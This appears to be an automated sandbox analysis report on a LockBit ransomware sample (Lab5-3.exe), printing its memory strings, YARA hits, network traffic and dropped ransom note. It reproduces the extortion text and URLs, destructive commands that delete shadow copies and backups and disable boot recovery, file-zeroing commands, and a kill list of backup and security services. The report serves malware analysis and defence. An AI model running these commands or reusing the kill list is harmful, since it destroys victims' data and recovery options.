                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                      Source: Lab5-3.exe, 00000000.00000003.2033908473.000000001B960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chromebook?p=app_intent
                      Source: Lab5-3.exe, Restore-My-Files.txt72.0.dr, Restore-My-Files.txt68.27.dr, Restore-My-Files.txt111.27.dr, Restore-My-Files.txt140.27.dr, Restore-My-Files.txt30.40.dr, Restore-My-Files.txt96.0.dr, Restore-My-Files.txt15.40.dr, Restore-My-Files.txt95.40.dr, Restore-My-Files.txt5.0.dr, Restore-My-Files.txt106.40.dr, Restore-My-Files.txt4.27.dr, Restore-My-Files.txt133.27.dr, Restore-My-Files.txt110.40.dr, Restore-My-Files.txt60.27.dr, Restore-My-Files.txt150.27.dr, Restore-My-Files.txt61.0.dr, Restore-My-Files.txt120.27.dr, Restore-My-Files.txt116.0.dr, Restore-My-Files.txt97.40.dr, Restore-My-Files.txt56.27.drString found in binary or memory: https://tb-manual.torproject.org/about
                      Source: Lab5-3.exe, 00000000.00000003.2033908473.000000001B960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlManaged
                      Source: Lab5-3.exe, 0000001B.00000003.2736606134.0000000007C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/br/chrome/browser/
                      Source: Lab5-3.exe, 0000001B.00000003.2736606134.0000000007CB1000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 0000001B.00000003.2738995885.0000000007DB1000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 0000001B.00000003.2736606134.0000000007BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/chrome/browser/
                      Source: Lab5-3.exe, 0000001B.00000003.2741937870.0000000007B31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/nl/chrome/browser/
                      Source: Lab5-3.exe, 0000001B.00000003.2741307384.0000000007AB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/no/chrome/browser/
                      Source: Lab5-3.exe, Restore-My-Files.txt72.0.dr, Restore-My-Files.txt68.27.dr, Restore-My-Files.txt111.27.dr, Restore-My-Files.txt140.27.dr, Restore-My-Files.txt30.40.dr, Restore-My-Files.txt96.0.dr, Restore-My-Files.txt15.40.dr, Restore-My-Files.txt95.40.dr, Restore-My-Files.txt5.0.dr, Restore-My-Files.txt106.40.dr, Restore-My-Files.txt4.27.dr, Restore-My-Files.txt133.27.dr, Restore-My-Files.txt110.40.dr, Restore-My-Files.txt60.27.dr, Restore-My-Files.txt150.27.dr, Restore-My-Files.txt61.0.dr, Restore-My-Files.txt120.27.dr, Restore-My-Files.txt116.0.dr, Restore-My-Files.txt97.40.dr, Restore-My-Files.txt56.27.drString found in binary or memory: https://www.torproject.org/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51272 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51271 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51267 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50243
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50246 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50245
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51269
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50247
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51267
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50246
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51269 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51272
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51271
                      Source: unknownHTTPS traffic detected: 23.202.106.101:443 -> 192.168.2.4:50245 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.202.106.101:443 -> 192.168.2.4:50246 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:50247 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:51267 version: TLS 1.2

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\Restore-My-Files.txtDropped file: All your important files are encrypted!Any attempts to restore your files with the thrid-party software will be fatal for your files!RESTORE YOU DATA POSIBLE ONLY BUYING private key from us.There is only one way to get your files back:1) Through a standard browser(FireFox, Chrome, Edge, Opera)| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50| 2. Follow the instructions on this page2) Through a Tor Browser - recommended| 1. Download Tor browser - https://www.torproject.org/ and install it.| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50 This link only works in Tor Browser! | 3. Follow the instructions on this page ### Attention! ### # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site # Do not rename encrypted files. # Do not try to decrypt using third party software, it may cause permanent data loss. # Decryption of your files with the help of third parties may cause increased price(they add their fee to our). # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. # Tor Browser user manual https://tb-manual.torproject.org/aboutJump to dropped file
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 9756, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 9756, type: MEMORYSTR
                      Source: Yara matchFile source: Lab5-3.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000028.00000002.3209902730.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.1879653667.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.1853803315.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000000.1878107343.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000000.1820658246.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1629021077.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.1764646363.000000000041B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 7476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 9836, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 9756, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 10188, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 11204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 7476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 9836, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 9756, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 10188, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 11204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Lab5-3.exe PID: 11204, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00411E40 GdiplusStartup,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GdipCreateBitmapFromScan0,GdipGetImageGraphicsContext,GdipCreateStringFormat,GdipSetStringFormatAlign,GdipSetStringFormatLineAlign,GdipFillRectangle,GdipDeleteBrush,malloc,GdipDeleteBrush,wsprintfW,free,GdipDeleteBrush,GdipDeleteBrush,GdipDeleteBrush,GdipDeleteStringFormat,GdipDeleteFont,GdipDeleteGraphics,GdipDisposeImage,GetTempPathW,GetTempFileNameW,wsprintfW,GdipSaveImageToFile,RegOpenKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,SystemParametersInfoW,19_2_00411E40
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00411E40 GdiplusStartup,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GdipCreateBitmapFromScan0,GdipGetImageGraphicsContext,GdipCreateStringFormat,GdipSetStringFormatAlign,GdipSetStringFormatLineAlign,GdipFillRectangle,GdipDeleteBrush,malloc,GdipDeleteBrush,wsprintfW,free,GdipDeleteBrush,GdipDeleteBrush,GdipDeleteBrush,GdipDeleteStringFormat,GdipDeleteFont,GdipDeleteGraphics,GdipDisposeImage,GetTempPathW,GetTempFileNameW,wsprintfW,GdipSaveImageToFile,RegOpenKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,SystemParametersInfoW,27_2_00411E40
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
                      Source: Lab5-3.exe, 00000000.00000003.1920967616.000000000061C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Users\user\Desktop\cmd.exe/c vssadmin Delete Shadows /All /Quietcmd.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\j
                      Source: Lab5-3.exe, 00000000.00000003.1664312642.0000000002565000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\System32\cmd.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsU3f\X
                      Source: Lab5-3.exe, 00000000.00000003.1859691073.000000000062D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet
                      Source: Lab5-3.exe, 00000000.00000003.1903327152.000000000061C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Users\user\Desktop\cmd.exe/c vssadmin Delete Shadows /All /Quietcmd.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\j
                      Source: Lab5-3.exe, 00000000.00000000.1629021077.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 00000000.00000000.1629021077.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet
                      Source: Lab5-3.exe, 00000000.00000000.1629021077.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: For more information see Restore-My-Files.txt that is located in every encrypted folder08:15:1008:15:10GenuineIntelAuthenticAMDGlobal\{02B49784-1CA2-436C-BC08-72FA3956507D}Global\{BEF590BE-11A6-442A-A85B-656C1081E04C}SeDebugPrivilegeDebug Privilege: OK08:15:10Local time: %d.%d %d:%dPC: %s08:15:12cmd.exeRemoved autorun key /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"SOFTWARE\Microsoft\Windows\CurrentVersion\RunXO1XADpO01"%s"Service %s stoppedwrapperDefWatchccEvtMgrccSetMgrSavRoamSqlservrsqlagentsqladhlpCulserverRTVscansqlbrowserSQLADHLPQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServicesqlwritermsmdsrvtomcat6zhudongfangyuvmware-usbarbitator64vmware-converterdbsrv12dbeng8MSSQL$MICROSOFT##WIDMSSQL$VEEAMSQL2012SQLAgent$VEEAMSQL2012SQLBrowserSQLWriterFishbowlMySQLMSSQL$MICROSOFT##WIDMySQL57MSSQL$KAV_CS_ADMIN_KITMSSQLServerADHelper100SQLAgent$KAV_CS_ADMIN_KITmsftesql-ExchangeMSSQL$MICROSOFT##SSEEMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTQBFCServiceQBVSSYooBackupYooITvsssqlsvc$MSSQLMSSQL$memtasmepocssophosveeambackupbedbgPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceMVArmorMVarmor64stc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcAcronisAgentARSMAcrSch2SvcCASAD2DWebSvcCAARCUpdateSvcWSBExchangeMSExchangeMSExchange$Service %s stoppedService %s stoppedService %s stoppedcmd.exerunas/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietwxServerwxServerViewsqlmangrRAguisuperviseCultureDefwatchwinwordQBW32QBDBMgrqbupdateaxlbridgehttpdfdlauncherMsDtSrvrjava360se360doctorwdswfsafefdhostGDscanZhuDongFangYuQBDBMgrNmysqldAutodeskDesktopAppacwebbrowserCreative CloudAdobe Desktop ServiceCoreSyncAdobe CEF HelpernodeAdobeIPCBrokersync-taskbarsync-workerInputPersonalizationAdobeCollabSyncBrCtrlCntrBrCcUxSysSimplyConnectionManagerSimply.SystemTrayIconfbguardfbserverONENOTEMwsa_servicekoaly-exp-engine-serviceTeamViewer_ServiceTeamViewertv_w32tv_x64TitanVSsmsnotepadRdrCEFsamoracleocssddbsnmpsynctimeagntsvcisqlplussvcxfssvcconmydesktopserviceocautoupdsencsvcfirefoxtbirdconfigmydesktopqosocommdbeng50sqbcoreserviceexcelinfopathmsaccessmspubonenoteoutlookpowerpntsteamthebatthunderbirdvisiowordpadbedbhvxmonbenetnsbengienpvlsvrbeserverraw_agent_svcvsnapvssCagServiceDellSystemDetectEnterpriseClientVeeamDeploymentSvcKilled process: %s [pid: %ld]Wow64DisableWow64FsRedirectionkernel32/c vssadmin Delete Shadows /All /Quiet/c bcdedit /set {default} recoveryenabled No/c bcdedit /set {default} bootstatuspolicy ignoreallfailures/c wbadmin DELETE SYSTEMSTATEBACKUP/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest/c wmic SHADOWCOPY /nointeractive/c wevtutil c
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: vssadmin.exe, 00000006.00000002.1725802350.000001DC2A470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet vssadmin delete shadows /all /quiet Winsta0\Default
                      Source: vssadmin.exe, 00000006.00000002.1725802350.000001DC2A470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
                      Source: vssadmin.exe, 00000006.00000002.1726555300.000001DC2A7B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmindeleteshadows/all/quieti
                      Source: Lab5-3.exe, 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet
                      Source: Lab5-3.exe, 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: For more information see Restore-My-Files.txt that is located in every encrypted folder08:15:1008:15:10GenuineIntelAuthenticAMDGlobal\{02B49784-1CA2-436C-BC08-72FA3956507D}Global\{BEF590BE-11A6-442A-A85B-656C1081E04C}SeDebugPrivilegeDebug Privilege: OK08:15:10Local time: %d.%d %d:%dPC: %s08:15:12cmd.exeRemoved autorun key /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"SOFTWARE\Microsoft\Windows\CurrentVersion\RunXO1XADpO01"%s"Service %s stoppedwrapperDefWatchccEvtMgrccSetMgrSavRoamSqlservrsqlagentsqladhlpCulserverRTVscansqlbrowserSQLADHLPQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServicesqlwritermsmdsrvtomcat6zhudongfangyuvmware-usbarbitator64vmware-converterdbsrv12dbeng8MSSQL$MICROSOFT##WIDMSSQL$VEEAMSQL2012SQLAgent$VEEAMSQL2012SQLBrowserSQLWriterFishbowlMySQLMSSQL$MICROSOFT##WIDMySQL57MSSQL$KAV_CS_ADMIN_KITMSSQLServerADHelper100SQLAgent$KAV_CS_ADMIN_KITmsftesql-ExchangeMSSQL$MICROSOFT##SSEEMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTQBFCServiceQBVSSYooBackupYooITvsssqlsvc$MSSQLMSSQL$memtasmepocssophosveeambackupbedbgPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceMVArmorMVarmor64stc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcAcronisAgentARSMAcrSch2SvcCASAD2DWebSvcCAARCUpdateSvcWSBExchangeMSExchangeMSExchange$Service %s stoppedService %s stoppedService %s stoppedcmd.exerunas/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietwxServerwxServerViewsqlmangrRAguisuperviseCultureDefwatchwinwordQBW32QBDBMgrqbupdateaxlbridgehttpdfdlauncherMsDtSrvrjava360se360doctorwdswfsafefdhostGDscanZhuDongFangYuQBDBMgrNmysqldAutodeskDesktopAppacwebbrowserCreative CloudAdobe Desktop ServiceCoreSyncAdobe CEF HelpernodeAdobeIPCBrokersync-taskbarsync-workerInputPersonalizationAdobeCollabSyncBrCtrlCntrBrCcUxSysSimplyConnectionManagerSimply.SystemTrayIconfbguardfbserverONENOTEMwsa_servicekoaly-exp-engine-serviceTeamViewer_ServiceTeamViewertv_w32tv_x64TitanVSsmsnotepadRdrCEFsamoracleocssddbsnmpsynctimeagntsvcisqlplussvcxfssvcconmydesktopserviceocautoupdsencsvcfirefoxtbirdconfigmydesktopqosocommdbeng50sqbcoreserviceexcelinfopathmsaccessmspubonenoteoutlookpowerpntsteamthebatthunderbirdvisiowordpadbedbhvxmonbenetnsbengienpvlsvrbeserverraw_agent_svcvsnapvssCagServiceDellSystemDetectEnterpriseClientVeeamDeploymentSvcKilled process: %s [pid: %ld]Wow64DisableWow64FsRedirectionkernel32/c vssadmin Delete Shadows /All /Quiet/c bcdedit /set {default} recoveryenabled No/c bcdedit /set {default} bootstatuspolicy ignoreallfailures/c wbadmin DELETE SYSTEMSTATEBACKUP/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest/c wmic SHADOWCOPY /nointeractive/c wevtutil c
                      Source: Lab5-3.exe, 00000013.00000000.1764646363.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 00000013.00000000.1764646363.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet
                      Source: Lab5-3.exe, 00000013.00000000.1764646363.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: For more information see Restore-My-Files.txt that is located in every encrypted folder08:15:1008:15:10GenuineIntelAuthenticAMDGlobal\{02B49784-1CA2-436C-BC08-72FA3956507D}Global\{BEF590BE-11A6-442A-A85B-656C1081E04C}SeDebugPrivilegeDebug Privilege: OK08:15:10Local time: %d.%d %d:%dPC: %s08:15:12cmd.exeRemoved autorun key /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"SOFTWARE\Microsoft\Windows\CurrentVersion\RunXO1XADpO01"%s"Service %s 